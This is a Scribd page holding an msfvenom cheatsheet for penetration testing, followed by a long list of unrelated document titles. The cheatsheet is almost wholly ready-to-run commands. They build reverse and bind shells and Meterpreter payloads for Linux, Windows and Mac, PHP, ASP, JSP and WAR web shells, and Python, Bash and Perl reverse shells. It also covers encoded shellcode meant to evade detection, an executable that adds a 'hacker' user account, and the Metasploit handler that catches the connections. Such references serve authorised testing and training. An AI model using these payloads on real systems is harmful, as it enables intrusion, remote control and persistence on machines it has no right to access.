MSFVenom Cheatsheet

This document provides a cheatsheet for using the msfvenom tool to generate various payloads for use in penetration testing. It lists payloads that can be generated for Linux, Windows, and Mac operating systems, including meterpreter reverse shells, bind shells, and reverse shells. It also covers generating web payloads for PHP, ASP, JSP, and Java payloads. Scripting payloads for Python, Bash, and Perl are listed as well. The cheatsheet also provides examples of generating shellcode and creating a new user account. It concludes with instructions for using Metasploit to handle generated payloads.

Uploaded by

manuel

Available Formats

Download as ODT, PDF, TXT or read online on Scribd

Download as odt, pdf, or txt

0% found this document useful (0 votes)

1K views2 pages

MSFVenom Cheatsheet

Uploaded by

manuel

Available Formats

Download as ODT, PDF, TXT or read online on Scribd

Download as odt, pdf, or txt

You are on page 1/ 2

MSFVenom Cheatsheet

List payloads
msfvenom -l
Binaries Payloads
Linux Meterpreter Reverse Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local
Port> -f elf > shell.elf
Linux Bind Meterpreter Shell
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Remote IP Address> LPORT=<Local
Port> -f elf > bind.elf
Linux Bind Shell
msfvenom -p generic/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf >
term.elf
Windows Meterpreter Reverse TCP Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local
Port> -f exe > shell.exe
Windows Reverse TCP Shell
msfvenom -p windows/shell/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe
> shell.exe
Windows Encoded Meterpreter Windows Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
Mac Reverse Shell
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f
macho > shell.macho
Mac Bind Shell
msfvenom -p osx/x86/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f
macho > bind.macho
Web Payloads
PHP Meterpreter Reverse TCP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f
raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
ASP Meterpreter Reverse TCP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local
Port> -f asp > shell.asp
JSP Java Meterpreter Reverse TCP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw
> shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f war
> shell.war
Scripting Payloads

Python Reverse Shell

msfvenom -p cmd/unix/reverse_python LHOST=<Local IP Address> LPORT=<Local Port> -f raw
> shell.py
Bash Unix Reverse Shell
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw >
shell.sh
Perl Unix Reverse shell
msfvenom -p cmd/unix/reverse_perl LHOST=<Local IP Address> LPORT=<Local Port> -f raw >
shell.pl
Shellcode
Windows Meterpreter Reverse TCP Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local
Port> -f <language>
Linux Meterpreter Reverse TCP Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local
Port> -f <language>
Mac Reverse TCP Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f
<language>
Create User
msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe
Metasploit Handler
use exploit/multi/handler
set PAYLOAD <Payload name>
Set RHOST <Remote IP>
set LHOST <Local IP>
set LPORT <Local Port>
Run

AD Sets DC01DC02MS01WK01
No ratings yet
AD Sets DC01DC02MS01WK01
24 pages
EJPTv2 Examen Cheatsheet - Pdf.es - en
No ratings yet
EJPTv2 Examen Cheatsheet - Pdf.es - en
29 pages
Salesforce Unofficial Study Guide For Certified Administrator
No ratings yet
Salesforce Unofficial Study Guide For Certified Administrator
447 pages
The Power of Recon
No ratings yet
The Power of Recon
46 pages
Lab10 - Dirbuster
No ratings yet
Lab10 - Dirbuster
15 pages
Metasploitable 2 Exploitability Guide - SecurityStreet
No ratings yet
Metasploitable 2 Exploitability Guide - SecurityStreet
12 pages
Ettercap
No ratings yet
Ettercap
25 pages
Pentestfor AD
No ratings yet
Pentestfor AD
48 pages
Penetration Testing Commands
No ratings yet
Penetration Testing Commands
22 pages
Host and Network Penetration Testing System Host Based Attacks
No ratings yet
Host and Network Penetration Testing System Host Based Attacks
124 pages
Pstools
100% (5)
Pstools
13 pages
CVE Analysis Report
No ratings yet
CVE Analysis Report
5 pages
Lab2 3.2,4,6.1 HOD401
No ratings yet
Lab2 3.2,4,6.1 HOD401
39 pages
AD and Windows Exploitation Cheat Sheet
No ratings yet
AD and Windows Exploitation Cheat Sheet
31 pages
Guide To SSRF
No ratings yet
Guide To SSRF
6 pages
Lab Experiment #08 - Network & Host Detection Scans
No ratings yet
Lab Experiment #08 - Network & Host Detection Scans
3 pages
Plantilla Reporte eCPPTv2 v2
No ratings yet
Plantilla Reporte eCPPTv2 v2
14 pages
FFUF Notes
100% (1)
FFUF Notes
3 pages
Wireless Hacking and Penetratin Testing
100% (1)
Wireless Hacking and Penetratin Testing
81 pages
© 2020 Caendra Inc. - Hera For PTX - Red-Teaming Active Directory Lab #2 (Els - Bank)
No ratings yet
© 2020 Caendra Inc. - Hera For PTX - Red-Teaming Active Directory Lab #2 (Els - Bank)
49 pages
DNSRecon
No ratings yet
DNSRecon
15 pages
03 - Performing Security Assessments
No ratings yet
03 - Performing Security Assessments
78 pages
Lateral Movement
No ratings yet
Lateral Movement
42 pages
Metasploit Framework
No ratings yet
Metasploit Framework
8 pages
Abusing SUDO (Linux Privilege Escalation)
100% (3)
Abusing SUDO (Linux Privilege Escalation)
5 pages
EDR Evasion Techniques Using Syscalls
100% (1)
EDR Evasion Techniques Using Syscalls
31 pages
Pandora
No ratings yet
Pandora
21 pages
Use of Metasploit Framework in Kali Linux: April 2015
100% (1)
Use of Metasploit Framework in Kali Linux: April 2015
9 pages
Lab 8 - Gaining Access of Metasploitable Machine Using Metasploit Framework
No ratings yet
Lab 8 - Gaining Access of Metasploitable Machine Using Metasploit Framework
1 page
Ccna S 2.0
No ratings yet
Ccna S 2.0
116 pages
MTPAHCheatSheetv01 Dark
100% (1)
MTPAHCheatSheetv01 Dark
1 page
Metasploit Penetration Testing Cookbook: Chapter No. 4 "Client-Side Exploitation and Antivirus Bypass"
No ratings yet
Metasploit Penetration Testing Cookbook: Chapter No. 4 "Client-Side Exploitation and Antivirus Bypass"
44 pages
Firewall Lab
No ratings yet
Firewall Lab
3 pages
Lab+ +Password+Cracking+Using+Mimikatz
No ratings yet
Lab+ +Password+Cracking+Using+Mimikatz
8 pages
Windows Local Privilege Escalation - HackTricks
No ratings yet
Windows Local Privilege Escalation - HackTricks
56 pages
How To Search Active Directory With Ldapsearch - Tyler's Guides
No ratings yet
How To Search Active Directory With Ldapsearch - Tyler's Guides
3 pages
Windowsattacks
No ratings yet
Windowsattacks
78 pages
Weaponized XSS Workshop
No ratings yet
Weaponized XSS Workshop
54 pages
Backdoor
No ratings yet
Backdoor
15 pages
Penetration Testing With Metasploit Framework
No ratings yet
Penetration Testing With Metasploit Framework
16 pages
EJPT Cheat Sheet
100% (1)
EJPT Cheat Sheet
49 pages
Oscp Webinar
No ratings yet
Oscp Webinar
47 pages
Linux: Setup A Transparent Proxy With Squid in Three Easy Steps
No ratings yet
Linux: Setup A Transparent Proxy With Squid in Three Easy Steps
11 pages
Cerberus
No ratings yet
Cerberus
26 pages
Mimikatz and Metasploit
No ratings yet
Mimikatz and Metasploit
23 pages
SMB Penetration Testing
No ratings yet
SMB Penetration Testing
15 pages
89 - Esm
No ratings yet
89 - Esm
10 pages
Malwaredotpy - Linux Basics Pentesting Tutorials
No ratings yet
Malwaredotpy - Linux Basics Pentesting Tutorials
18 pages
An Ultimate Guide To DDos Attack: Detection, Prevention and Mitigation
No ratings yet
An Ultimate Guide To DDos Attack: Detection, Prevention and Mitigation
41 pages
Netcat Manual
No ratings yet
Netcat Manual
7 pages
Multimaster
No ratings yet
Multimaster
33 pages
AV or EDR Bypass
No ratings yet
AV or EDR Bypass
33 pages
Web Shells Rev2
100% (1)
Web Shells Rev2
42 pages
CRTP Command Checklists
No ratings yet
CRTP Command Checklists
6 pages
SQLi
No ratings yet
SQLi
20 pages
Tryhackme: Overpass 2 - Hacked Walkthrough: 1. What Was The Url of The Page They Used To Upload A Reverse Shell?
No ratings yet
Tryhackme: Overpass 2 - Hacked Walkthrough: 1. What Was The Url of The Page They Used To Upload A Reverse Shell?
11 pages
27.2.15 Lab - Investigating A Malware Exploit - ILM
100% (1)
27.2.15 Lab - Investigating A Malware Exploit - ILM
17 pages
Intrusion detection system Standard Requirements
From Everand
Intrusion detection system Standard Requirements
Gerardus Blokdyk
No ratings yet
Keeping Cyber Security Simple
From Everand
Keeping Cyber Security Simple
Tommy Lorenzo
No ratings yet
Configuring IPCop Firewalls: Closing Borders with Open Source
From Everand
Configuring IPCop Firewalls: Closing Borders with Open Source
Barrie Dempster
No ratings yet
Certified Ethical Hacker C.E.H v11 Exam Prep And Dumps
From Everand
Certified Ethical Hacker C.E.H v11 Exam Prep And Dumps
Byte Books
No ratings yet
Visitor Tracking Systems Comparison UPDATED 20230718
No ratings yet
Visitor Tracking Systems Comparison UPDATED 20230718
9 pages
Crack The Code CVC Words
No ratings yet
Crack The Code CVC Words
7 pages
Appendix A: The ATM System
No ratings yet
Appendix A: The ATM System
30 pages
Ethical Hacking: Introduction To Ethical Hacking
No ratings yet
Ethical Hacking: Introduction To Ethical Hacking
4 pages
Ddj-sx2 List of Midi Message e
No ratings yet
Ddj-sx2 List of Midi Message e
6 pages
2.0-TC-3-04.93-AEROMEDICAL-TRAINING-2018 - Repaired
No ratings yet
2.0-TC-3-04.93-AEROMEDICAL-TRAINING-2018 - Repaired
176 pages
Build and Boat For Treasure
No ratings yet
Build and Boat For Treasure
16 pages
E SPEL+Ref75 r1
No ratings yet
E SPEL+Ref75 r1
988 pages
Thesis Sans Semibold
100% (3)
Thesis Sans Semibold
7 pages
MI4304 He Phan Tan Giua Ky
No ratings yet
MI4304 He Phan Tan Giua Ky
21 pages
Chapter04 - Quadratic Equation
No ratings yet
Chapter04 - Quadratic Equation
54 pages
MSFVENOM
No ratings yet
MSFVENOM
17 pages
EDP Part 1
No ratings yet
EDP Part 1
42 pages
SAD 9e Chapter 01 IM
No ratings yet
SAD 9e Chapter 01 IM
35 pages
GigaVUE ReleaseNotes v51004
No ratings yet
GigaVUE ReleaseNotes v51004
45 pages
Split Up of XII IP Practical 2023-24 Solution
No ratings yet
Split Up of XII IP Practical 2023-24 Solution
25 pages
Hardware Multithreading
No ratings yet
Hardware Multithreading
10 pages
Weekly Working Report (Week 9)
No ratings yet
Weekly Working Report (Week 9)
2 pages
Slides Deep Learning On AWS With NVIDIA From Training To Deployment
No ratings yet
Slides Deep Learning On AWS With NVIDIA From Training To Deployment
48 pages
Resume 2
No ratings yet
Resume 2
1 page
Pan8 Cybersecurity Essentials Lab 2: Configuring Authentication
No ratings yet
Pan8 Cybersecurity Essentials Lab 2: Configuring Authentication
23 pages
Information
No ratings yet
Information
5 pages
GCAM APK Latest Version 2025
No ratings yet
GCAM APK Latest Version 2025
4 pages
Fast String Matching in Python
No ratings yet
Fast String Matching in Python
5 pages
Voice Based E-Notice Board Using Android
100% (1)
Voice Based E-Notice Board Using Android
9 pages
Smartplant P&Id Insulation Manager: User'S Guide
No ratings yet
Smartplant P&Id Insulation Manager: User'S Guide
30 pages
Business Analyst
No ratings yet
Business Analyst
7 pages
Three-Axis Servo Control System Applcation Note (en)
No ratings yet
Three-Axis Servo Control System Applcation Note (en)
52 pages
Voucher-Putri Net-3-Jam-Up-600-08.26.22
No ratings yet
Voucher-Putri Net-3-Jam-Up-600-08.26.22
3 pages

MSFVenom Cheatsheet

Uploaded by

MSFVenom Cheatsheet

Uploaded by

MSFVenom Cheatsheet

Python Reverse Shell

You might also like